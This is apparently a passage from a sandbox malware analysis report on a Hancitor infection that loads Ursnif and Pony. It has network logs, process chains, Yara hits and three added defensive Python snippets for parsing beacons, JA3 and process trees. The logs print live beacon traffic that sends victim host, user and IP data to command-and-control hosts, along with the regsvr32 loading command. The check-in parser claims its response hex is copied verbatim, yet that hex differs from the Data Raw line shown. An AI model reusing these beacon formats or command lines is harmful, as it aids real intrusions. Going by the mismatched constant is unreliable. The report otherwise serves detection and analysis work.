                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:27.383918047 CEST | 930 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJCXQARRABw==0
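The six POST /4/forum.php exchanges above all carry the same 111-byte form (GUID=…&BUILD=…&INFO=…&IP=…&TYPE=…&WIN=…, the check-in format of the Hancitor family that this report's Yara rules match) and each gets back a short chunked, base64-encoded reply. Two things are easy to misread in the listing: the "Data Ascii" rendering drops non-printable bytes, so the chunk framing ("c", CRLF, "0") is fused into strings like cZKPAARRABw==0, and for the request the rendering shows computer\user while the raw hex carries the real sandbox hostname and user name. The following Python is an added example for this page, not sandbox or malware code: it parses the check-in from the raw hex of the first POST, reassembles the chunked reply, and base64-decodes it. The two hex strings are copied from the "Data Raw" lines above; the function names and the field-presence check are this example's own, and no decoding beyond base64 is attempted because the page does not show the sample's own routine.

```python
"""Parse one Hancitor check-in/response pair from the HTTP log above.

Added example for this report; not sandbox or malware code. The two hex
strings are copied verbatim from the "Data Raw" lines of the first
POST /4/forum.php exchange in this section. Function names and the
field-presence check are this example's own.
"""
import base64

# "Data Raw" of the POST body (Content-Length: 111), copied from the report.
CHECKIN_RAW_HEX = (
    "47 55 49 44 3d "
    "35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 "
    "26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 "
    "26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 "
    "44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e "
    "26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 "
    "26 54 59 50 45 3d 31 "
    "26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29"
)
# "Data Raw" of the matching 200 OK body (Transfer-Encoding: chunked).
RESPONSE_RAW_HEX = "63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"

REQUIRED_FIELDS = ("GUID", "BUILD", "INFO", "IP", "TYPE", "WIN")


def ascii_view(raw: bytes) -> str:
    """Reproduce the report's "Data Ascii" rendering: non-printable bytes dropped.

    This is why the chunk size line, the CRLFs and the terminating "0" appear
    fused into one string such as cZKPAARRABw==0 on the page.
    """
    return "".join(chr(b) for b in raw if 0x20 <= b < 0x7F)


def parse_checkin(body: bytes) -> dict:
    """Split the beacon body into its fields.

    The form is sent without percent-encoding (the space, '@' and backslash in
    INFO are literal), so a plain split is the faithful parser.
    """
    fields = {}
    for pair in body.decode("ascii").split("&"):
        key, sep, value = pair.partition("=")
        if not sep:
            raise ValueError(f"malformed pair: {pair!r}")
        fields[key] = value
    missing = [k for k in REQUIRED_FIELDS if k not in fields]
    if missing:
        raise ValueError(f"check-in is missing {missing}")
    return fields


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0 CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        nl = raw.index(b"\r\n", pos)
        size = int(raw[pos:nl].split(b";")[0], 16)  # chunk extensions are ignored
        pos = nl + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def decode_response(raw_hex: str) -> bytes:
    """Dechunk the body, then base64-decode the single chunk the server returned.

    The result is left as opaque bytes: the page shows no task payload and no
    further decoding routine, so nothing beyond base64 is assumed here.
    """
    payload = dechunk(bytes.fromhex(raw_hex))
    return base64.b64decode(payload, validate=True)


def main() -> None:
    request = bytes.fromhex(CHECKIN_RAW_HEX)
    print("request bytes:", len(request), "(header said Content-Length: 111)")
    for key, value in parse_checkin(request).items():
        print(f"  {key:5s} = {value}")
    response = bytes.fromhex(RESPONSE_RAW_HEX)
    print("as rendered :", ascii_view(response))
    print("dechunked   :", dechunk(response).decode())
    print("base64 out  :", decode_response(RESPONSE_RAW_HEX).hex())


if __name__ == "__main__":
    main()
```

Run it and compare the INFO field it prints with the "Data Ascii" line above: the raw bytes, not the rendered line, are what the Content-Length of 111 covers, so any indicator or signature built from this traffic should be derived from the hex.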


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.1.102 | 49721 | 8.208.80.226 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 14, 2020 11:22:28.692337990 CEST | 932 | OUT | GET /webstore/AOTtVIIFCyCl/rwHdKEZcyQz/zhsxqwtz0yJYCb/7wUwfdl67qUD5HOfnxeCy/4K2RFYcLg8x3JVwy/HHqS5FYbT5LR812/3drnDFI56W2PMZ4T3B/Z2k1S5bLG/ggEuoPBYFVY9Ucp4X2wJ/fxiLjJeTe5E6Iv80mkC/IkwsZL_2F_2BeRu3yeL0kw/Iz7Rtfj8FmL6o/19PNHBMl/ZMvH4neYIcicG6MljnDN_2B/AEobh9WXfv/6OZ5eYjqbttNmOt00/h6KBLnTcHE_0/A_0DXlYD3rU/jMSlmxbL3fthS_/2BwqQVILC1SW2R8JiDYGM/FJdHfBp4_2FZn6db/50iMd53h_2BkoMJ/H HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: low.explik.at
                                                                                                                                      Connection: Keep-Alive
Jul 14, 2020 11:22:28.938731909 CEST | 932 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:28 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410


                                                                                                                                      HTTPS Packets

Timestamp: Jul 14, 2020 11:20:35.155435085 CEST
Source IP: 185.206.163.136
Source Port: 443
Dest IP: 192.168.1.102
Dest Port: 49707
Certificate chain presented (leaf first):
• Subject: CN=accesoeducativo.com; Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US; Not Before: Wed Apr 29 20:38:16 CEST 2020; Not After: Tue Jul 28 20:38:16 CEST 2020
• Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US; Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before: Thu Mar 17 17:40:46 CET 2016; Not After: Wed Mar 17 17:40:46 CET 2021
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
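The JA3 column pair above is the fingerprint string (TLS version, cipher suites, extensions, supported groups and point formats, each list joined with "-") and the MD5 of that string. Recomputing the digest from the string is a quick integrity check when a row has been copied out of a report, and the same code shows the one edge case that trips up hand-rolled implementations: RFC 8701 GREASE values, which JA3 drops before hashing so that a randomised ClientHello still yields a stable hash. The block below is an added example for this page, not Joe Sandbox code; the fingerprint string and digest are copied from the table, the GREASE set is the standard one, and the function names are this example's own. A hash that belongs to the OS TLS stack, as the Trident user agent in the HTTP headers above suggests for this session, is shared by every benign program using that stack, so on its own it identifies the client software, not the malware.

```python
"""Recompute and cross-check the JA3 client digest from the HTTPS table above.

Added example for this report, not Joe Sandbox code. JA3 is MD5 over
"SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats",
with each list joined by '-' and GREASE values removed. The string and digest
below are copied from the table; everything else is illustrative.
"""
import hashlib

REPORT_JA3_STRING = (
    "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171"
    "-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0"
)
REPORT_JA3_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

# RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa); JA3 drops them so a
# client that randomises them still hashes to the same fingerprint.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}


def build_ja3_string(version, ciphers, extensions, curves, point_formats):
    """Assemble the JA3 string from ClientHello fields, filtering GREASE."""
    def join(values):
        return "-".join(str(v) for v in values if v not in GREASE)
    return ",".join([str(version), join(ciphers), join(extensions),
                     join(curves), join(point_formats)])


def parse_ja3_string(s):
    """Split a JA3 string back into (version, ciphers, extensions, curves, point_formats)."""
    parts = s.split(",")
    if len(parts) != 5:
        raise ValueError(f"JA3 string must have 5 comma-separated fields, got {len(parts)}")
    version = int(parts[0])
    lists = [[int(x) for x in p.split("-")] if p else [] for p in parts[1:]]
    return (version, *lists)


def ja3_digest(s):
    """MD5 hex digest of the JA3 string, as shown in the table's digest column."""
    return hashlib.md5(s.encode("ascii")).hexdigest()


def digest_matches_report():
    """True if the string and digest copied from the table are consistent.

    A mismatch means one of the two was altered when the table was copied (or
    that the tool used a different GREASE/ordering convention).
    """
    return ja3_digest(REPORT_JA3_STRING) == REPORT_JA3_DIGEST


if __name__ == "__main__":
    version, ciphers, extensions, curves, point_formats = parse_ja3_string(REPORT_JA3_STRING)
    print("TLS version field:", version, "(771 = 0x0303, TLS 1.2 ClientHello)")
    print("cipher suites   :", len(ciphers))
    print("extensions      :", extensions)
    # Constructed input: the same ClientHello with GREASE values injected.
    greased = build_ja3_string(version, [0x0A0A] + ciphers, extensions + [0x1A1A],
                               [0x2A2A] + curves, point_formats)
    print("GREASE removed  :", greased == REPORT_JA3_STRING)
    print("digest matches  :", digest_matches_report())
```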

                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:11:20:10
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                      Imagebase:0x350000
                                                                                                                                      File size:43854104 bytes
                                                                                                                                      MD5 hash:D672D26C85AEB9536B9736BF04054969
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:11:20:25
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx
                                                                                                                                      Imagebase:0x1250000
                                                                                                                                      File size:20992 bytes
                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                      Reputation:moderate
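The three General blocks of this System Behavior section describe the execution chain a detection engineer would want to alert on: EXCEL.EXE, then regsvr32.exe /s /i with a bare .ocx file name, then a 32-bit svchost.exe started with no -k service-group argument (the svchost entry that follows this one). The Python below is an added example for this page, not Joe Sandbox output or code: it applies those three checks to process records transcribed from the Path and Commandline fields above. The parent-child links are this example's assumption, since the report lists start order here but no parent PIDs; the rule names are invented for illustration. Note that the svchost Path reading SysWOW64 while its Commandline says System32 is ordinary WOW64 file-system redirection for a 32-bit process and is not itself an indicator.

```python
"""Process-tree checks over the three records in this System Behavior section.

Added example for this report, not Joe Sandbox code. Records are transcribed
from the General blocks above; parent links and rule names are assumptions
made for illustration.
"""
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "cmd.exe"}

# Constructed from the report's General blocks; "parent" is assumed.
PROCESSES = [
    {"pid": 1, "parent": None,
     "path": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r"'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2, "parent": 1,
     "path": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx"},
    {"pid": 3, "parent": 2,
     "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe"},
]

# Windows passes the command line as one string; split on whitespace outside quotes.
ARG_RE = re.compile(r"""'[^']*'|"[^"]*"|\S+""")


def image_name(path: str) -> str:
    """Lower-cased file name of the image, independent of System32/SysWOW64."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> list:
    return ARG_RE.findall(cmdline)


def evaluate(processes):
    """Return (pid, rule, detail) for every record that trips a rule."""
    by_pid = {p["pid"]: p for p in processes}
    hits = []
    for p in processes:
        name = image_name(p["path"])
        args = argv(p["cmdline"])[1:]
        parent = by_pid.get(p["parent"])
        parent_name = image_name(parent["path"]) if parent else ""

        # Office applications do not legitimately spawn LOLBin script hosts.
        if parent_name in OFFICE and name in SCRIPT_HOSTS:
            hits.append((p["pid"], "office_spawns_script_host", f"{parent_name} -> {name}"))

        # regsvr32 /i calls DllInstall in the module; a bare file name is
        # resolved from the current directory (the document folder for an
        # Office child), and a non-.dll extension is a further oddity.
        if name == "regsvr32.exe":
            flags = {a.lower() for a in args if a.startswith("/")}
            targets = [a for a in args if not a.startswith("/")]
            if "/i" in flags and targets:
                target = targets[-1].strip("'\"")
                if "\\" not in target or not target.lower().endswith(".dll"):
                    hits.append((p["pid"], "regsvr32_relative_module", target))

        # Real service hosts are started by services.exe with "-k <group>".
        if name == "svchost.exe":
            if "-k" not in {a.lower() for a in args}:
                hits.append((p["pid"], "svchost_without_service_group", p["cmdline"]))
            if parent_name != "services.exe":
                hits.append((p["pid"], "svchost_parent_not_services", parent_name or "<unknown>"))
    return hits


if __name__ == "__main__":
    for pid, rule, detail in evaluate(PROCESSES):
        print(f"pid {pid}: {rule}: {detail}")
```

The same three rules transfer directly to Sysmon event 1 or EDR process-creation telemetry; the parent link, which this example has to assume, is exactly the field those sources supply.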

                                                                                                                                      General

                                                                                                                                      Start time:11:20:33
                                                                                                                                      Start date:14/07/2020
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\svchost.exe
Imagebase: 0x30000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Hancitor, Description: Hancitor Payload, Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Author: kevoreilly
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: pony, Description: Identify Pony, Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, Author: Joe Security
• Rule: pony, Description: Identify Pony, Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.461350530.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
• Rule: pony, Description: Identify Pony, Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000003.461304914.0000000005A01000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 11:20:37
Start date: 14/07/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /K
Imagebase: 0x110000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:20:37
Start date: 14/07/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7234f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:20:40
Start date: 14/07/2020
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
Imagebase: 0xcd0000
File size: 434584 bytes
MD5 hash: 80E91E3C0F5563E4049B62FCAF5D67AC
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:20:44
Start date: 14/07/2020
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\svchost.exe
Imagebase: 0x30000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 11:20:45
Start date: 14/07/2020
Path: C:\Users\user\AppData\Local\Temp\BN6D10.tmp
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\BN6D10.tmp
Imagebase: 0x400000
File size: 145920 bytes
MD5 hash: 5105430437588F8878DA6957BC8C3119
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
• Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 42%, Virustotal, Browse
• Detection: 14%, Metadefender, Browse
• Detection: 55%, ReversingLabs
Reputation: low

General

Start time: 11:21:14
Start date: 14/07/2020
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff752040000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:21:18
Start date: 14/07/2020
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
Imagebase: 0xc50000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:22:03
Start date: 14/07/2020
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff752040000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:22:04
Start date: 14/07/2020
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
Imagebase: 0xc50000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis

Execution Graph

Execution Coverage: 10.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 23.1%
Total number of Nodes: 13
Total number of Limit Nodes: 1

Graph

execution_graph (one node per line as "id address [API]", one edge per line as "from->to"):
917 46b85c0
918 46b85e3
917->918
923 46b7c00
918->923
920 46b86cf
926 46b8120 VirtualProtect
920->926
924 46b7c41
923->924
925 46b7c74 VirtualAlloc
924->925
925->920
927 46b816c
926->927
928 46b83bd
927->928
929 46b838f VirtualProtect
927->929
929->927
930 46b7d20
931 46b7c00 VirtualAlloc
930->931
932 46b7d2d
931->932

Executed Functions

Control-flow Graph

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,?), ref: 046B7C84
Strings
Memory Dump Source
• Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
Similarity
• API ID: AllocVirtual
• String ID: VirtualAlloc
• API String ID: 4275171209-164498762
• Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
• Instruction ID: feb1bc8488f71dbfea399997e137ecf55dd54227e97d794fe7686e6663d2a0b2
• Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
• Instruction Fuzzy Hash: 4411D060D08289EEFF01D7E894097EEBFB55B11709F044098D6846A282D6BA5758C7E6
Uniqueness

Uniqueness Score: 0.19%

Control-flow Graph

APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 046B8166
• VirtualProtect.KERNELBASE(?,?,00000000), ref: 046B83B0
Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                        • Instruction ID: 40edd7147cc87fc2ecacd0ef3eb445f14ae59efb430cb21fd8acc92a2965f0a2
                                                                                                                                        • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                        • Instruction Fuzzy Hash: 6EB188B5A00209DFCB08DF88C891EAEBBB5BF88314F148559E9499B355D731F982CBD4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.02%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 90c0b716c6baafa9d66677ac3545438cea8421ebec01131d137ea710dda224c3
                                                                                                                                        • Instruction ID: 001473ac52fd3d8a69fe8befedc7c7f5f12ea0893e4bca2d553c50233ae25243
                                                                                                                                        • Opcode Fuzzy Hash: 90c0b716c6baafa9d66677ac3545438cea8421ebec01131d137ea710dda224c3
                                                                                                                                        • Instruction Fuzzy Hash: CC115EA240A6C24FE307EB38C8A75837FE0AE1723431E1BCAC4955F4A3D518A51ACB06
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:36.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:87.2%
                                                                                                                                        Signature Coverage:16.9%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:36

                                                                                                                                        Graph

